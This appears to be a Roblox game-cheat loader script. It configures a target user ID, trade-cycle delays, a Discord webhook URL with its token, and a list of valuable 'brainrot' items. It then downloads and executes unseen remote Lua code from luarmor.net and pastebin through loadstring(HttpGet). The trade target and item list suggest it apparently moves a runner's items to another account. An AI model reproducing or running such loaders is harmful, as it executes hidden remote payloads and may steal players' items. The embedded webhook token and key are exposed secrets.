getgenv().SECRET_KEY = "mrr_6c187cc369c649b598ab69fe74614760"
getgenv().TARGET_ID = 8364286390
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1481257360340287519/94G4Mnm1zstqxqH3xvYBS6gj_Wa6ilJxGMjfP0OavPFEPBarHLkbVa1m_bSzSkJN_-Ru"
getgenv().TARGET_BRAINROTS = {
        ["La Romantic Grande"] = true,
    ["Los Spaghettis"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Esok Sekolah"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Swaggy Bros"] = true,
    ["Tang Tang Keletang"] = true,
    ["Garama and Madundung"] = true,
    ["Tictac Sahur"] = true,
    ["Ketupat Kepat"] = true,
    ["Ketupat Bros"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Money Money Reindeer"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["La Jolly Grande"] = true,
    ["La Grande Combinasion"] = true,
    ["La Taco Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["La Supreme Combinasion"] = true,
    ["La Sahur Combinasion"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["La Ginger Sekolah"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Sammyni Fattini"] = true,
    ["Spooky and Pumpky"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Capitano Moby"] = true,
    ["Celularcini Viciosini"] = true,
    ["Festive 67"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Mobilis"] = true,
    ["Los 25"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Amigos"] = true,
    ["Cerberus"] = true,
    ["Cooki and Milki"] = true,
    ["Tralaledon"] = true,
    ["Reinito Sleighito"] = true,
    ["Headless Horseman"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Tuff Toucan"] = true,
    ["Burguro And Fryuro"] = true,
    ["Guest 666"] = true,
    ["Love Love Bear"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Fishino Clownino"] = true,
    ["Rosetti Tualetti"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Cigno Fulgoro"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
loadstring(game:HttpGet("https://pastebin.com/raw/mduwJN5s"))()
